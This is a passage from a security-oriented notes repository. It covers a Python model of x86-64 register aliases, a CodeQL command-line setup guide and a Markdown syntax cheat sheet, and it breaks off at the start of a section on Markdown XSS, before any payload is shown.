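        raise ValueError(f"{alias!r} is not an alias of {self.name}")

    def read(self, alias: str) -> int:
        """Low `width` bits of the register, as seen through the alias."""
        return self.value & ((1 << self.width_of(alias)) - 1)

    def write(self, alias: str, v: int) -> int:
        """Write through an alias and return the resulting 64-bit value."""
        width = self.width_of(alias)
        mask = (1 << width) - 1
        if width >= 32:
            # 32-bit writes zero-extend into the upper 32 bits (64-bit writes trivially so)
            self.value = v & mask
        else:
            # 16- and 8-bit writes replace only their own bits; the rest is preserved
            self.value = (self.value & ~mask) | (v & mask)
        return self.value


if __name__ == "__main__":
    for r in ("rax", "rsi", "rsp", "r8", "r15"):
        print(r, subregisters(r))
    reg = Register("rax", 0x1122334455667788)
    print(hex(reg.write("al", 0xFF)))    # upper bytes kept
    print(hex(reg.write("eax", 0x1)))    # upper half cleared
```

The zero-extension on 32-bit writes is the detail that trips people up when reading disassembly: `mov eax, 1` clears the upper half of `rax`, whereas `mov al, 1` or `mov ax, 1` only touches the low bits.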

See [shellcode.md](../binary-exploitation/shellcode.md "mention") for writing malicious Assembly code and some examples of compiling

--------------------------------------------------------------------------------
/languages/codeql.md:
--------------------------------------------------------------------------------
---
description: A query language for repositories of code
---

# CodeQL

## Setup

Follow the Getting Started documentation to install the precompiled binary:

{% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/getting-started-with-the-codeql-cli" %}
Getting Started with installing the CodeQL CLI and some other useful tools
{% endembed %}

On the releases page, you should download the "CodeQL Bundle" from any of the assets, likely [`codeql-bundle-linux64.tar.gz`](https://github.com/github/codeql-action/releases/latest/download/codeql-bundle-linux64.tar.gz).

In case you need more queries for different languages not already included in the bundle, try downloading a [precompiled pack of queries](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/setting-up-the-codeql-cli#testing-the-codeql-cli-configuration) per language:

{% code title="Example" %}
```bash
codeql pack download codeql/python-queries
```
{% endcode %}

## Creating a database

{% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/creating-codeql-databases" %}
Create a CodeQL database from a repository to analyze later with queries
{% endembed %}

Create a database with the following command, inside the root folder of the project you are trying to analyze. `<database>` will be the output directory, and `<language>` is one of the supported languages that the project is written in.

```bash
codeql database create <database> --language=<language>
```

{% code title="Example" %}
```bash
codeql database create .codeql --language=python
```
{% endcode %}

{% hint style="info" %}
**Tip**: For some compiled languages like `java`, the autobuilder may not be able to build your source code to index it. You can choose `--build-mode=none` to disable building the project and just look at the source files.
{% endhint %}

## Analyzing a database

{% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/analyzing-databases-with-the-codeql-cli" %}
Use queries to analyze a CodeQL database
{% endembed %}

When you have created a database, use the `analyze` command to run queries on it. `<format>` can be one of several output formats, like `csv` or `sarif-latest`.

```bash
codeql database analyze <database> --format=<format> --output <output>
```

{% code title="Example" %}
```bash
codeql database analyze .codeql --format=sarif-latest --output codeql.sarif
```
{% endcode %}

You can view a CSV file with any spreadsheet program, but the most useful format is [`.sarif`](https://docs.github.com/en/code-security/codeql-cli/codeql-cli-reference/sarif-output). To view the findings and locations in the code you can use the [Sarif Viewer VSCode extension](https://github.com/microsoft/sarif-vscode-extension).

{% embed url="https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer" %}
Download **SARIF Viewer** extension by Microsoft DevLabs
{% endembed %}

--------------------------------------------------------------------------------
/languages/markdown.md:
--------------------------------------------------------------------------------
---
description: >-
  Markdown is an easy to use markup language used in the Github README for
  example
---

# Markdown

## Syntax

Markdown is a standard for text markup. It allows you to make text **bold**, _italic_, and in all kinds of different styles. It uses special characters around certain text to apply markup to it. Often markdown is used in text editors like on GitHub `README.md` files or Discord messages. The files are then converted to another language like HTML with CSS, or to PDF, to actually display the formatting. Here are the rules:

{% embed url="https://www.markdownguide.org/cheat-sheet/" %}
A cheatsheet explaining all of the Markdown syntax
{% endembed %}

| Element | Markdown Syntax |
| ------- | --------------- |
| Heading | `# H1`<br>`## H2`<br>`### H3` |
| **Bold** | `**bold text**` |
| _Italic_ | `*italicized text*` |
| ![](<../.gitbook/assets/image (8) (1).png>) | `> blockquote` |
| 1. First item<br>2. Second item<br>3. Third item | `1. First item`<br>`2. Second item`<br>`3. Third item` |
| • First item<br>• Second item<br>• Third item | `- First item`<br>`- Second item`<br>`- Third item` |
| `code` | `` `code` `` |
| ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png>) | `---` |
| [Link](https://www.example.com) | `[title](https://www.example.com)` |
| ![](<../.gitbook/assets/image (11) (1).png>) | `![alt text](image.jpg)` |

### Advanced Syntax

| Element | Markdown Syntax |
| ------- | --------------- |
| Table (Syntax / Description, Header / Title, Paragraph / Text) | `\| Syntax \| Description \|`<br>`\| ----------- \| ----------- \|`<br>`\| Header \| Title \|`<br>`\| Paragraph \| Text \|` |
| Fenced code block (`{ "firstName": "John", "lastName": "Smith", "age": 25 }`) | ```` ```json ````<br>`{`<br>`  "firstName": "John",`<br>`  "lastName": "Smith",`<br>`  "age": 25`<br>`}`<br>```` ``` ```` |
| ~~Strikethrough~~ | `~~strikethrough~~` |
| • Checklist<br>• Item 2<br>• Item 3 | `- [x] Write the press release`<br>`- [ ] Update the website`<br>`- [ ] Contact the media` |
| Emoji! 😀 | `Emoji! :grinning:` |

## Markdown XSS

Markdown often gets compiled to HTML to be styled with CSS later. When converting something to HTML you need to make sure attackers can't inject arbitrary HTML, like `